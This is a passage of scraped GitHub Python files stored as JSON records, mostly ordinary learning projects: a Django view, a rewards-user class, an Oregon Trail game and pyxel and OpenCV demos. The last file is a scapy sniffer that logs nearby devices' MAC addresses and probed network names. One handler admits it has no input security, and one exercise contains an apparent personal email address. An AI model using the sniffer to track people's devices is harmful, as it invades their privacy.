print(counter)\r\n else:\r\n pass\r\n counter+=1\r\n","repo_name":"vlad-lavrynovych/sortAlgorythms","sub_path":"search_rk_4.py","file_name":"search_rk_4.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23172820205","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\n\nfrom .models import Comentario\nfrom .forms import ActualizarComentario\n\n# Create your views here.\n\n@login_required(login_url='users:login')\ndef listarcomentarios(request):\n \"\"\"Vista de los comentarios del usuario\"\"\"\n\n # Recuperamos los comentarios del usuario\n comentarios = Comentario.objects.filter(titular=request.user, estado='Publicado')\n pendientes = Comentario.objects.filter(fuente=request.user, estado='Creado')\n\n # Mensaje de \"error\"\n mensaje = None\n if (not comentarios) & (not pendientes):\n mensaje = \"Aun no tienes comentarios\"\n\n return render(request, 'comentarios.html', {\n 'comentarios':comentarios,\n 'pendientes': pendientes,\n 'mensaje': mensaje,\n })\n\n@login_required(login_url='users:login')\ndef calificar(request, comentario_id):\n \"\"\"Vista para calificar la tutoria\"\"\"\n\n # Recuperamos el comentario\n comentario = Comentario.objects.get(id=comentario_id)\n\n if request.method == 'POST':\n\n # Recuperamos info del formulario\n form = ActualizarComentario(request.POST, instance=comentario)\n \n # Guardamos los cambios y actualizamos la calificacion\n if form.is_valid():\n form.save()\n comentario.estado = 'Publicado'\n comentario.save()\n comentario.actualizarCalificacion()\n \n return redirect('comentarios')\n else:\n # creamos el formulario y lo mostramos\n ya_es_favorito = request.session.get('ya_es_favorito', False)\n form = ActualizarComentario(instance=comentario)\n return render(request, 'calificar.html', {\n 'form': form,\n 'comentario': comentario,\n 'ya_es_favorito': ya_es_favorito\n })\n","repo_name":"federicoGuerrerot/ppi_10","sub_path":"comentarios/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26088597286","text":"# Python OOP - user assignment modified for chaining methods\n\nclass Users:\n \"\"\"Create a model of a user\"\"\"\n\n def __init__(self, first_name, last_name, email, age):\n \"\"\"Initialize the attributes for the user\"\"\"\n self.first_name = first_name.title()\n self.last_name = last_name.title()\n self.email = email\n self.age = age\n self.is_rewards_member = False\n self.gold_card_points = 0\n\n def display_info(self):\n \"\"\"Display user info\"\"\"\n full_name = f\"{self.first_name} {self.last_name}\"\n print(f\"\\nUser information:\")\n print(f\"User: {full_name}\")\n print(f\"User email: {self.email}\")\n print(f\"User age: {self.age}\")\n if self.is_rewards_member == True:\n print(f\"{self.first_name} is a rewards member\")\n else:\n print(f\"{self.first_name} is not a rewards members\")\n if self.gold_card_points == 0:\n print(f\"{self.first_name} has no gold card points\\n\")\n else:\n print(f\"{self.first_name} has {self.gold_card_points} points\\n\")\n return self\n\n def enroll(self):\n \"\"\"Enroll user into rewards member and add 200 points\"\"\"\n if self.is_rewards_member == False:\n print(f\"Welcome to Rewards, {self.first_name}!\")\n self.is_rewards_member = True\n self.gold_card_points += 200\n print(f\"{self.first_name} you now have {self.gold_card_points} points\")\n else:\n print(f\"{self.first_name} you are already a rewards member\\n\")\n return self\n\n def spend_points(self, amount):\n \"\"\"Redeem reward points if member has them\"\"\"\n if self.gold_card_points > amount:\n self.gold_card_points -= amount\n print(f\"{self.first_name} you have redeemed {amount} points\")\n else:\n print(f\"{self.first_name} you do not have enough points to redeem\")\n print(f\"you only have {self.gold_card_points} points\")\n return self\n\n# Create first user\nprint(\"\\nFIRST USER:\")\n\nuser_neal = Users('neal', 'dreessen', 'dreessen.edu@gmail.com', 53)\n# Used chaining methods\nuser_neal.display_info().enroll().display_info().spend_points(50).display_info().enroll().spend_points(400)\n\nprint(\"\\nSECOND USER:\")\n\nuser_jeni = Users('jeni', 'mccarthy', 'her@email.com', 50)\n# Used chaining methods\nuser_jeni.display_info().enroll().spend_points(80)\n\nprint(\"\\nTHIRD USER:\")\n\nuser_burt = Users('burt', 'reynolds', 'burt@bandit.com', 75)\n# Used chaining methods\nuser_burt.display_info().spend_points(40)\n\n","repo_name":"dreessen-n/coding-dojo_python","sub_path":"fundamentals/oop/users_chaining_methods.py","file_name":"users_chaining_methods.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15462575498","text":"# NOTE: NO SECURITY. You can add crap like a series name \"\" and have bad things happen.\n#\n\nfrom google.appengine.api import users\n\nfrom handlers import base\n\nclass Series(base.Base):\n def get(self, name):\n template_values = {\n 'user': users.get_current_user(),\n 'name' : name\n }\n self.render('series.html', template_values)\n","repo_name":"kberg/dviz","sub_path":"handlers/series.py","file_name":"series.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37681138840","text":"\"\"\"\nThis module is the entry point for the game. It handles the high level\ngame logic and acts as a controller for all of modules.\n\"\"\"\n\nimport graphics\nimport game_io as io\nimport player\nimport random\nimport hunting\nimport misfortunes\nfrom time import sleep\n\nclass engine():\n \"\"\"\n Holds high level game state variables and lower level objects from modules.\n Runs the main game loop.\n \n Members:\n sleep (int): Amount of time to sleep between turns. Gives user time to read event messages.\n should_close (bool): Allows game to exit.\n did_win (bool): True if the player reached a win condition.\n did_quit (bool): True if the player ended the game early.\n \"\"\"\n def __init__(self):\n\n\n self.messages = io.messages()\n self.player = player.player()\n self.sleep = 2\n self.should_close = False\n self.did_win = False\n self.did_quit = False\n self.gui = graphics.gui(player)\n \n def run_tests(self, debug=False):\n \"\"\"\n Alternate way to run the engine to allow for debugging.\n \n Arguments:\n debug (bool) (optional): True will run the debug console input.\n \n Returns:\n None\n \"\"\"\n self.player.load_debug()\n while not self.should_close: \n self.player.inventory['food'] = 1000\n self.player.inventory['oxen'] = 10\n self.take_turn()\n \n # Run debug console input.\n if debug:\n debug_input = input(\"$ \")\n if debug_input == 'q':\n self.should_close = True\n if debug_input == '1':\n if misfortunes.randomize(self.player):\n self.should_close = True\n if debug_input == '2':\n self.player.update_inventory('kits',2)\n self.close()\n \n def new_game(self):\n \"\"\"\n Welcomes user and allows them to enter player/member names.\n \n Arguments:\n None\n \n Returns:\n None\n \"\"\"\n self.messages.print_message('welcome')\n sleep(self.sleep)\n \n # Party leader.\n print('What is your name?')\n self.player.members.append(player.member(io.get_input_string(),is_leader=True))\n \n # Party members.\n counts = ['first','second','third','fourth']\n for i in range(4):\n print('Please enter the name of your {} party member.'.format(counts[i]))\n self.player.members.append(player.member(io.get_input_string()))\n \n def store(self, fort=False):\n \"\"\"\n Prints prices to player and allows them to make purchases.\n \n Arguments:\n fort (bool) (optional): True if the store is a fort store, otherwise its the start store.\n \n Returns:\n None\n \"\"\"\n # Handle different messages to be printed.\n if not fort:\n key = 'start_store'\n self.messages.print_message('store_welcome')\n elif fort:\n self.player.forts_visited += 1\n key ='fort_store'\n key += \"_{}\".format(self.player.forts_visited)\n message_count = self.messages.get_message_parsed_count(key)\n \n # Manually set order and attributes for buying items.\n keys = ['oxen','food','bullets','parts','kits']\n prices = [40,0.5,2,10,15]\n quants = [2,1,20,1,1]\n subtotal = 0.0\n \n # Change prices and quantities for fort stores.\n if fort:\n increase = self.player.forts_visited * 0.25 # Prices increase further along trail.\n prices[0] = round(prices[0] / 2 + increase * prices[0],2)\n for i in range(1,len(prices)):\n prices[i] += round(prices[i] * increase,2)\n quants = [1,1,20,1,1]\n\n # Handle special case for buying yokes.\n if not fort:\n while True:\n try:\n self.messages.print_message_parsed(key,0)\n response = io.get_input_int(low=0)\n amount = response * prices[0]\n if not(100 <= amount and amount <= 200):\n raise Exception()\n break \n except Exception:\n print(\"You tried to spend ${} on oxen.\".format(\"%.2f\" %amount))\n subtotal += amount\n self.player.update_inventory(keys[0],response*quants[0])\n self.player.consume('money', amount)\n print(\"Sub-total: ${}\".format(\"%.2f\" %subtotal))\n \n # Handle the rest of the store buying options.\n if not fort:\n start_range = range(1,message_count)\n elif fort:\n start_range = range(0,message_count)\n for i in start_range:\n self.messages.print_message_parsed(key,i)\n while True:\n try:\n response = io.get_input_int(low=0)\n quant = response * quants[i]\n amount = response * prices[i]\n if not self.player.can_consume('money',amount):\n raise AssertionError\n if not self.player.can_add_to_inventory(keys[i],quant):\n raise ValueError\n break\n except AssertionError:\n print(\"You don't enough money, please enter a new amount.\")\n except ValueError:\n pass\n subtotal += amount\n self.player.add_to_inventory(keys[i],response*quants[i])\n self.player.consume('money', amount) \n print(\"Sub-total: ${}\".format(\"%.2f\" %subtotal))\n print(\"Total: ${}\".format(\"%.2f\" %subtotal))\n \n def pick_start_date(self):\n \"\"\"\n Prompts user to proceed with standard start data or change to a custom date.\n \n Arguments:\n None\n \n Returns:\n None\n \"\"\"\n print('Would you like to take off on {} (1) or on a different date (2)?'.format(self.player.current_date))\n options = [1,2]\n response = io.get_input_int_protected(options)\n if response == 1:\n return\n print(\"You can choose to start between March 1 and May 1\")\n \n # Get month.\n print('Please enter what month you would like to start. \\\n \\n \\t March (3) \\\n \\n \\t April (4) \\\n \\n \\t May (5) \\\n ')\n options = [3,4,5]\n response = io.get_input_int_protected(options)\n \n # Change dates allowed per game spec and real calendar days.\n days_allowed = 31\n if response == 4:\n days_allowed = 30\n if response == 5:\n days_allowed = 1\n \n # Get day.\n self.player.current_date = self.player.current_date.replace(month=response)\n print('Please enter what day you would like to start.')\n response = io.get_input_int(low = 1, high = days_allowed)\n self.player.current_date = self.player.current_date.replace(day=response)\n \n def take_turn(self):\n \"\"\"\n Main menu for game. Allows user to pick what to do, updates mileage,\n checks for end-game scenarios, and chance for raider attack.\n \n Arguments:\n None\n \n Returns:\n None\n \"\"\"\n sleep(self.sleep)\n self.player.print_status()\n \n # Handle turn options.\n self.messages.print_message('turn_options')\n options = [1,2,3,4]\n response = io.get_input_int_protected(options)\n if response == 1:\n self.rest()\n elif response == 2:\n self.travel()\n elif response == 3:\n self.hunt()\n elif response == 4:\n self.should_close = True\n self.did_quit = True\n return\n \n # Update mileage, check for end game and chance for raiders.\n self.player.update_miles_to_next()\n if self.player.check_for_end_game():\n self.should_close = True\n return\n if misfortunes.randomize(self.player):\n self.should_close = True\n return\n if self.player.check_for_end_game():\n self.should_close = True\n return\n misfortunes.raider_attack(self.player)\n \n def hunt(self):\n \"\"\"\n Calls hunting module to hunt and handles updating amount of food.\n Allows player to adjust rations.\n \n Arguments:\n None\n \n Returns:\n None\n \"\"\"\n current_food = self.player.get_from_inventory('food')\n \n # Hunt.\n hunted_food = hunting.hunt(self.player)\n print(\"You returned with {} pounds of food\".format(hunted_food))\n \n # Adjust rations.\n self.messages.print_message('rations')\n options = [1,2,3]\n response = io.get_input_int_protected(options)\n if response == 1:\n self.player.rations = 2\n elif response == 2:\n self.player.rations = 3\n elif response == 3:\n self.player.rations = 5\n \n # Consume food.\n food_consumed = self.player.members_alive * self.player.rations\n print(\"You consumed {} pounds of food\".format(food_consumed))\n current_food -= food_consumed\n \n # Handle adding food to inventory.\n if current_food + hunted_food > 1000:\n print(\"The wagon can only hold 1000 pounds of food\")\n left_food = hunted_food + current_food - 1000\n print(\"You left {} pounds of food behind\".format(left_food))\n self.player.update_inventory('food', 1000)\n else:\n total_food = current_food + hunted_food\n self.player.update_inventory('food',total_food)\n \n # Advance one day and fully heal members.\n self.player.advance_time(1)\n self.player.heal_all_to_full_if_sick()\n \n def travel(self):\n \"\"\"\n Travel random distance based on number of oxen.\n Handles encountered landmarks and win-condition.\n Adjusts food/mileage.\n \n Arguments:\n None\n \n Returns:\n None\n \"\"\"\n random.seed()\n \n # Random mileage based on amount of oxen.\n lower = 70 + int(self.player.inventory['oxen']*5) # Lower bound ranges from 70-120.\n miles_to_travel = random.randint(lower,140)\n days_elapsed = 14\n food_consumed = self.player.members_alive * self.player.rations * days_elapsed\n\n # Travel and encounter landmark.\n if miles_to_travel >= self.player.miles_to_next_mark:\n location = self.player.get_next_location()\n original_miles = miles_to_travel\n miles_to_travel = self.player.miles_to_next_mark\n \n # Adjust food/days for arriving early.\n adjustment = float(miles_to_travel / original_miles)\n food_adjusted = int(food_consumed*adjustment)\n days_adjusted = int(days_elapsed*adjustment)\n \n # Update game-state with adjusted values.\n self.player.advance_time(days_adjusted)\n self.player.consume('food', food_adjusted)\n self.player.travel(miles_to_travel)\n self.player.heal_all_if_sick()\n self.player.update_miles_to_next()\n \n # Update GUI.\n if not self.player.is_halfway:\n self.gui.draw_next_coord()\n self.gui.draw_next_coord()\n \n # Check for win condition.\n if self.player.miles_traveled >= self.player.win_mileage:\n self.should_close = True\n self.did_win = True\n # Check if lose condition should preceed win condition.\n if self.player.check_for_end_game(output=False):\n self.did_win = False\n else:\n print(\"You arrived at {}\".format(location.name))\n return\n \n # Check for lose condition before arriving.\n if self.player.check_for_end_game(output=False):\n self.should_close = True\n return\n \n print('You were prepared to travel {} miles but arrived at {}'.format(original_miles, location.name))\n print('You consumed {} pounds of food'.format(food_adjusted))\n print('You traveled {} day(s)'.format(int(days_elapsed*adjustment)))\n\n # Handle encountering the landmark.\n if location.kind == 'Fort':\n self.at_fort()\n elif location.kind == 'River':\n self.at_river(location)\n elif location.kind == None:\n self.at_landmark()\n self.player.update_next_location()\n \n # Travel without encountering landmark.\n else: \n print('You traveled {} miles in {} days'.format(miles_to_travel,days_elapsed))\n self.player.advance_time(days_elapsed)\n self.player.consume('food', food_consumed)\n print('You consumed {} pounds of food'.format(food_consumed))\n self.player.travel(miles_to_travel)\n self.player.heal_all_if_sick()\n \n # Update GUI if halfway to landmark.\n if self.player.should_draw_halfway():\n self.gui.draw_next_coord()\n \n def at_fort(self):\n \"\"\"\n Handles fort options.\n \n Arguments:\n None\n \n Returns:\n None\n \"\"\"\n # Allow infinite resting/shopping.\n while not self.should_close:\n self.player.print_status()\n self.messages.print_message('fort_options')\n options = [1,2,3]\n response = io.get_input_int_protected(options)\n if response == 1:\n self.rest()\n elif response == 2:\n self.store(fort=True)\n elif response == 3:\n return\n \n # Check for lose conditions.\n if self.player.check_for_end_game(output=False):\n self.should_close = True\n\n def at_river(self, location):\n \"\"\"\n Handles river options. Calls misfortunes if player fails river crossing.\n \n Arguments:\n None\n \n Returns:\n None\n \"\"\"\n river_height = location.height\n \n # Allow infinite resting and attempts at crossing river.\n while not self.should_close:\n self.player.print_status()\n print(\"River Height: {} feet\".format(river_height))\n self.messages.print_message('river_options')\n options = [1,2,3,4]\n response = io.get_input_int_protected(options)\n # Rest.\n if response == 1:\n self.rest()\n \n # Ford.\n elif response == 2:\n if river_height > 3: # Fail fording rivers higher than 3ft.\n misfortunes.failed_river(self.player)\n else:\n print(\"You successfully forded the river\")\n return\n \n # Chaulk and float.\n elif response == 3:\n # 65% chance of succesful floating.\n chance = 65\n n_chance = list(range(1,chance + 1))\n if random.randint(1,100) in n_chance:\n print(\"You successfully floated the river\")\n return\n else:\n misfortunes.failed_river(self.player)\n \n # Ferry.\n elif response == 4:\n if self.player.can_consume('money',5):\n print(\"You took the ferry across\")\n self.player.consume('money',5)\n return\n else:\n print(\"You do not have enough money\")\n \n # Check for end game conditions.\n if self.player.check_for_end_game(output=False):\n self.should_close = True\n \n def at_landmark(self):\n \"\"\"\n Handles landmark options.\n \n Arguments:\n None\n \n Returns:\n None\n \"\"\"\n # Allow infinite resting.\n while not self.should_close: \n self.player.print_status()\n self.messages.print_message('landmark_options')\n options = [1,2]\n response = io.get_input_int_protected(options)\n \n # Rest.\n if response == 1:\n self.rest()\n \n # Continue.\n elif response == 2:\n return\n \n # Check for end game.\n if self.player.check_for_end_game(output=False):\n self.should_close = True\n \n def rest(self):\n \"\"\"\n Advances time a random amount and consumes the appropiate amount of food.\n \n Arguments:\n None\n \n Returns:\n None\n \"\"\"\n random.seed()\n \n # Rest between 1,3 days, calculate food consumed.\n days_to_sleep = random.randint(1,3)\n food_consumed = self.player.members_alive * self.player.rations * days_to_sleep\n print('You decided to rest for {} day(s)'.format(days_to_sleep))\n print('You consumed {} pounds of food'.format(food_consumed))\n \n # Update game-state.\n self.player.advance_time(days_to_sleep)\n self.player.consume('food', food_consumed)\n self.player.heal_all_to_full_if_sick()\n \n def run(self):\n \"\"\"\n Main game loop.\n \n Arguments:\n None\n \n Returns:\n None\n \"\"\"\n self.new_game()\n self.store()\n self.pick_start_date()\n while not self.should_close:\n self.take_turn()\n self.close()\n \n def close(self):\n \"\"\"\n Report game win/lose/quit to player and perform any cleanup.\n Exit point for program.\n \n Arguments:\n None\n \n Returns:\n None\n \"\"\"\n if self.did_win:\n print(\"Congratulations you successfully navigated the trail!\")\n elif not self.did_quit:\n print(\"Sorry, you have lost the game. Play again soon!\")\n elif self.did_quit:\n print(\"Sorry you had to leave early. Play again soon!\")\n input(\"Enter any key to exit \\n>>> \")\n \n # Perform cleanup.\n self.gui.close()\n\ndef main():\n \"\"\"\n Program entry point.\n \n Arguments:\n None\n \n Returns:\n None\n \"\"\"\n e = engine()\n e.run()\n #e.run_tests(debug=True)\n \n# Define program entry point.\nif __name__ == \"__main__\":\n main()\n","repo_name":"brajkowski/OregonTrail","sub_path":"modules/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":16324,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"19450177624","text":" \nimport math\nimport pyxel \nimport array\nimport random\n\nSCREEN_WIDTH = 120\nSCREEN_HEIGHT = 120\nEMPTY = 0\nVAPOR = 8\nWATER = 5\nSLIMECORE = 6\nSLIME = 7\nINVALID = -1\nVALID = 0\nSLIMETIMEMAX = 50\nSLIMEMOVEMAX = 40\nSLIMESIZE = 300\n\nclass Vec2:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.magnitude = math.sqrt(x * x + y * y) \n def normalized(self):\n self.x = self.x / self.magnitude \n self.y = self.y / self.magnitude\n self.magnitude = 1\n \n\nclass Map:\n TOPLEFT = Vec2(-1,-1)\n TOPRIGHT = Vec2(1,-1)\n TOP = Vec2(0,-1)\n LEFT = Vec2(-1,0)\n RIGHT = Vec2(1,0)\n BOTLEFT = Vec2(-1,1)\n BOTRIGHT = Vec2(1,1)\n BOT = Vec2(0,1)\n def __init__(self, width, height):\n self.map = [0 for x in range(height * width)]\n self.width = width\n self.height = height\n \n def get(self, x, y):\n if(x < 0 or x >= self.width or y < 0 or y >= self.height):\n return INVALID\n return self.map[y*self.width + x]\n \n def set(self, x, y, num):\n if(x < 0 or x >= self.width or y < 0 or y >= self.height):\n return INVALID\n self.map[y*self.width + x] = num\n return VALID\n \nmapv2 = Map(SCREEN_WIDTH,SCREEN_HEIGHT)\n\nclass Vec2_normalized: \n def __init__(self, x, y): \n self.magnitude = math.sqrt(x * x + y * y) \n self.x = x / self.magnitude \n self.y = y / self.magnitude\n\n \nclass Pixel:\n def __init__(self, px, py, type):\n self.position = Vec2(px, py)\n self.type = type\n self.moved = False\n mapv2.set(self.position.x,self.position.y, type)\n if(type == SLIME):\n self.corepos = Vec2(0,0)\n self.offset = Vec2(0,0)\n self.state = 0\n self.timeleft = 0\n self.movesleft = 0\n if(type == SLIMECORE):\n self.slimebod = [Pixel(px,py,SLIME) for x in range(SLIMESIZE)]\n \n def draw(self):\n pyxel.pix(self.position.x,self.position.y, self.type)\n if(self.type == SLIMECORE):\n for x in self.slimebod:\n x.draw()\n \n def peek(self, num):\n res = mapv2.get(self.position.x + num.x, self.position.y + num.y)\n return res\n \n def try_teleport(self, pos):\n res = mapv2.get(pos.x , pos.y )\n if res == EMPTY:\n mapv2.set(self.position.x, self.position.y, EMPTY)\n self.position.x = pos.x\n self.position.y = pos.y\n mapv2.set(self.position.x, self.position.y, self.type)\n self.moved = True\n return res\n \n \n def try_go(self,num):\n res = mapv2.get(self.position.x + num.x, self.position.y + num.y)\n if res == EMPTY:\n mapv2.set(self.position.x, self.position.y, EMPTY)\n self.position.x += num.x\n self.position.y += num.y\n mapv2.set(self.position.x, self.position.y, self.type)\n self.moved = True\n return res\n \n \n ### this is the state machine for water sim ###\n \n # try go down then bot left or bot right\n def node_0(self):\n res = self.try_go(Map.BOT)\n if res == INVALID:\n return 4\n elif res == EMPTY:\n return 7\n else:\n return 1\n # rand for bot left / bot right\n def node_1(self):\n num = random.randint(0, 1)\n if num == 1:\n return 2\n else:\n return 3\n #bot left\n def node_2(self):\n res = self.try_go(Map.BOTLEFT)\n return 4\n # bot right\n def node_3(self):\n res = self.try_go(Map.BOTRIGHT)\n return 4\n # rand for left / right\n def node_4(self):\n num = random.randint(0, 2)\n if num == 1:\n return 5\n elif num == 2:\n return 6\n else:\n return 7\n # left\n def node_5(self):\n res = self.try_go(Map.LEFT)\n return 7\n # right\n def node_6(self):\n res = self.try_go(Map.RIGHT)\n return 7\n # setting positions in the map\n def node_7(self):\n self.updating = False\n return 0\n # go up\n def node_8(self):\n res = self.try_go(Map.TOP)\n if res == INVALID:\n return 4\n elif res == EMPTY:\n return 7\n else:\n return 9\n # rand for top left / top right\n def node_9(self):\n num = random.randint(0, 1)\n if num == 1:\n return 10\n else:\n return 11\n # top left\n def node_10(self):\n res = self.try_go(Map.TOPLEFT)\n return 4\n # top right\n def node_11(self):\n res = self.try_go(Map.TOPRIGHT)\n return 4\n \n def node_12(self):\n if self.peek(Map.TOP) != EMPTY:\n res = self.try_go(Map.BOT)\n if res == EMPTY:\n return 7\n else:\n return 4\n return 7\n \n # try go down then left or right\n def node_13(self):\n res = self.try_go(Map.BOT)\n if res == EMPTY:\n return 7\n else:\n return 4\n \n \n FUNC_MAP = { 0: node_0, 1: node_1, 2: node_2, 3: node_3, 4: node_4, 5: node_5, 6: node_6, 7: node_7, 8: node_8, 9: node_9, 10: node_10, 11: node_11, 12: node_12, 13: node_13 }\n START_NODE = { WATER: 13, VAPOR: 8 , SLIMECORE: 7, SLIME: 13}\n \n def VAPOR_SPECIFIC_UPDATE(self):\n num = random.randint(0,200)\n if num == 5:\n if mapv2.get(self.position.x , self.position.y + 1) == EMPTY:\n num = mapv2.get(self.position.x - 1, self.position.y - 1) + \\\n mapv2.get(self.position.x + 1, self.position.y - 1) + \\\n mapv2.get(self.position.x, self.position.y - 1)\n if (num == 24):\n self.type = WATER\n \n def WATER_SPECIFIC_UPDATE(self):\n num = random.randint(0,200)\n if num == 5:\n if mapv2.get(self.position.x , self.position.y - 1) == EMPTY:\n num = mapv2.get(self.position.x - 1, self.position.y + 1) + \\\n mapv2.get(self.position.x + 1, self.position.y + 1) + \\\n mapv2.get(self.position.x, self.position.y + 1)\n if (num == 15):\n self.type = VAPOR\n \n def SLIMECORE_SPECIFIC_UPDATE(self):\n \n for x in self.slimebod:\n mapv2.set(x.position.x, x.position.y, EMPTY)\n \n if pyxel.btnp(pyxel.KEY_A,1,1): \n self.try_go(Map.LEFT)\n if pyxel.btnp(pyxel.KEY_D,1,1): \n self.try_go(Map.RIGHT)\n if pyxel.btnp(pyxel.KEY_W,1,1): \n self.try_go(Map.TOP)\n if pyxel.btnp(pyxel.KEY_S,1,1): \n self.try_go(Map.BOT)\n \n for x in self.slimebod:\n mapv2.set(x.position.x, x.position.y, SLIME)\n \n mapv2.set(self.position.x, self.position.y, SLIMECORE)\n \n for x in self.slimebod:\n x.corepos.x = self.position.x\n x.corepos.y = self.position.y\n x.update()\n \n def SLIME_SPECIFIC_UPDATE(self):\n self.updating = True\n \n if self.timeleft <= 0 or self.movesleft <= 0:\n pos = Vec2(0,0)\n pos.x = self.corepos.x + random.randint(-2,2)\n pos.y = self.corepos.y + random.randint(-3,5)\n if self.try_teleport(pos) == EMPTY:\n self.timeleft = SLIMETIMEMAX\n self.movesleft = SLIMEMOVEMAX\n \n def WATER_POST_UPDATE(self):\n pass\n \n def VAPOR_POST_UPDATE(self):\n pass\n \n def SLIMECORE_POST_UPDATE(self):\n pass\n \n def SLIME_POST_UPDATE(self):\n if self.moved:\n self.movesleft -= 1\n self.timeleft -=1\n \n SPECIFIC_UPDATE = { \n WATER: WATER_SPECIFIC_UPDATE, \n VAPOR: VAPOR_SPECIFIC_UPDATE, \n SLIMECORE: SLIMECORE_SPECIFIC_UPDATE, \n SLIME: SLIME_SPECIFIC_UPDATE\n }\n \n POST_SPECIFIC_UPDATE = { \n WATER: WATER_POST_UPDATE, \n VAPOR: VAPOR_POST_UPDATE, \n SLIMECORE: SLIMECORE_POST_UPDATE, \n SLIME: SLIME_POST_UPDATE\n }\n \n def update(self):\n self.updating = True\n self.moved = False\n Pixel.SPECIFIC_UPDATE[self.type](self)\n res = Pixel.START_NODE[self.type]\n while self.updating:\n res = Pixel.FUNC_MAP[res](self)\n Pixel.POST_SPECIFIC_UPDATE[self.type](self)\n \npixelarray = []\n\n\n\nclass App: \n def __init__(self): \n pyxel.init(SCREEN_WIDTH, SCREEN_HEIGHT)\n # shows the mouse\n pyxel.mouse(True)\n self.sandarray = []\n self.Paused = True\n pyxel.run(self.update, self.draw)\n \n def update(self): \n if pyxel.btnp(pyxel.KEY_Q): \n pyxel.quit()\n if pyxel.btnp(pyxel.MOUSE_LEFT_BUTTON):\n pixelarray.append(Pixel(pyxel.mouse_x, pyxel.mouse_y, SLIMECORE))\n #if pyxel.btnp(pyxel.MOUSE_LEFT_BUTTON, 1, 1):\n # for i in range(-5,5):\n # for j in range(-5,5):\n # if(mapv2.get(pyxel.mouse_x + i,pyxel.mouse_y + j) == EMPTY):\n # pixelarray.append(Pixel(pyxel.mouse_x + i, pyxel.mouse_y + j, WATER) )\n if pyxel.btnp(pyxel.MOUSE_RIGHT_BUTTON, 1, 1):\n for i in range(-5,5):\n for j in range(-5,5):\n if(mapv2.get(pyxel.mouse_x + i,pyxel.mouse_y + j) == EMPTY):\n pixelarray.append(Pixel(pyxel.mouse_x + i, pyxel.mouse_y + j, WATER) )\n \n if pyxel.btnp(pyxel.KEY_P):\n self.Paused = not self.Paused\n \n if self.Paused == False or pyxel.btnp(pyxel.KEY_C):\n for y in pixelarray:\n y.update()\n\n def draw(self):\n pyxel.cls(0)\n for y in pixelarray:\n y.draw()\n \nApp()\n","repo_name":"lamjiajin/PythonGame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16276168623","text":"# -*- coding: utf-8 -*-\n# @Time : 2023/3/26 下午11:18\n# @Author : lizheng\n# @FileName: demo4.py.py\n# @Software: PyCharm\n\n##通过HSV空间对不同的颜色的内容进行提取\nimport cv2\n\nimport numpy as np\n\nopencv=cv2.imread(\"../images/opencv-logo.png\")\n\nhsv=cv2.cvtColor(opencv,cv2.COLOR_BGR2HSV)\n\ncv2.imshow('opencv',opencv)\n\n#=============指定蓝色值的范围=============\n\nminBlue=np.array([110,50,50])\n\nmaxBlue=np.array([130,255,255])\n\n#确定蓝色区域\n\nmask=cv2.inRange(hsv,minBlue,maxBlue)\n\n#通过掩码控制的按位与运算,锁定蓝色区域\n\nblue=cv2.bitwise_and(opencv,opencv,mask=mask)\n\ncv2.imshow('blue',blue)\n\n#=============指定绿色值的范围=============\n\nminGreen=np.array([50,50,50])\n\nmaxGreen=np.array([70,255,255])\n\n#确定绿色区域\nmask=cv2.inRange(hsv,minGreen,maxGreen)\n\n#通过掩码控制的按位与运算,锁定绿色区域\n\ngreen=cv2.bitwise_and(opencv,opencv,mask=mask)\n\ncv2.imshow('green',green)\n\n#=============指定红色值的范围=============\n\nminRed=np.array([0,50,50])\n\nmaxRed=np.array([30,255,255])\n\n#确定红色区域\n\nmask=cv2.inRange(hsv,minRed,maxRed)\n\n#通过掩码控制的按位与运算,锁定红色区域\n\nred=cv2.bitwise_and(opencv,opencv,mask=mask)\n\ncv2.imshow('red',red)\n\ncv2.waitKey()\n\ncv2.destroyAllWindows()","repo_name":"LiZheng1997/OpenCV_Practice","sub_path":"Chapters/Chapter4/demo4.py","file_name":"demo4.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"30600789841","text":"#!/usr/local/bin/python3\n# coding=utf8\nimport os\nfrom scapy.all import *\n\n#here is your interface in monitor mode\niface=\"wlan1\"\n\nos.system(\"ifconfig \" + iface + \" down\") \nos.system(\"iwconfig \" + iface + \" mode monitor\")\nos.system(\"ifconfig \" + iface + \" up\")\n\nstation_list = []\nclient_list = []\n\ndef PacketHandler(pkt) :\n\n\tif pkt.haslayer(Dot11) :\n\t\t#print(pkt.command())\n\t\t#check if it's a station\n\t\tif pkt.type == 0 and pkt.subtype == 8 :\n\t\t\t#check mac address for redundancy\n\t\t\t#if pkt.addr2 not in station_list :\n\t\t\t\t#station_list.append(pkt.addr2) \n\t\t\t\tprint(\"Station - MAC: \" + str(pkt.addr2).strip() +\" Signal: \"+ str(pkt.db_antsignal) +\" SSID: \" + str(pkt.info).strip('b\\''))\n\t\t#or check if it's a client\n\t\telif pkt.type == 0 and pkt.subtype == 4 :\n\t\t\t#check mac address for redundancy\n\t\t\t#if pkt.addr2 not in client_list :\n\t\t\t\t#client_list.append(pkt.addr2)\n\t\t\t\tprint(\"Client - MAC: \" + str(pkt.addr2).strip() + \" Probe: \" + str(pkt.info).strip('b\\''))\n\n\n#sniff(iface=iface, prn = PacketHandler)\n\n\nwhile True:\n\tfor channel in range(1, 14):\n\t\tos.system(\"iwconfig \" + iface + \" channel \" + str(channel))\n\t\tprint (\"Sniffing on channel \" + str(channel))\n\n\t\tsniff(iface=iface, prn=PacketHandler, count=10, timeout=1, 